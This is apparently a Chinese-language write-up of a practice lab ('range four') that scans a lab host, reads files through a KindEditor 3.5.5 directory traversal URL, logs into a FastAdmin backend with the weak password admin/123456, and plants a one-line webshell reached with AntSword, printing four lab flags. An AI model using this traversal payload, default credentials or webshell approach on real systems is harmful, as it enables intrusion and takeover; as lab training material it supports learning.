搜不到名字的靶场

靶场四-WP

收集资产

netdiscover -r 192.168.0.0/24
nmap -p- 192.168.0.135 #masscan -p 0-65535 192.168.0.135
nmap -sV -sC -p- -A 192.168.0.135

信息

端口 服务
80/TCP HTTP
5985/TCP wsman (http 403)
7001/TCP afs3-callback (http 403)

wsman与afs3-callback均可想办法实现攻击

网站收集

http://192.168.0.135/robots.txt得到flag

flag{@OASQqwe128@}

发现http://192.168.0.135/0是靶场登录页面

访问7001端口在examples找到kindeditor的样例版本为3.5.5,存在目录穿越漏洞

访问http://192.168.0.135:7001/php/file_manager_json.php?path=/可以看到返回值

http://192.168.0.135:7001/php/file_manager_json.php?path=/.././.././.././.././.././

注意:每返回上一级都需要使用.././

访问192.168.0.135:7001/php/file_manager_json.php?path=/.././.././fastadmin/public/可以看到一个flag.txt

image-20240718101534176

获取flag2

flag{@hjykkx995Qa@}

发现WNeSOgakp.php为管理后台登陆地址,fastadmin管理后台存在弱口令admin/123456

在角色组找到flag3

flag{@hjlakDGDkjso@}

Getshell

由于后台插件安装了在线命令1.1.0

所以配置了一个一句话木马,然后通过蚁剑连接即可

image-20240718104226852

进入虚拟终端在workstation的桌面找到flag4

flag{ed@sjhhjkqkgQQ}

发表新评论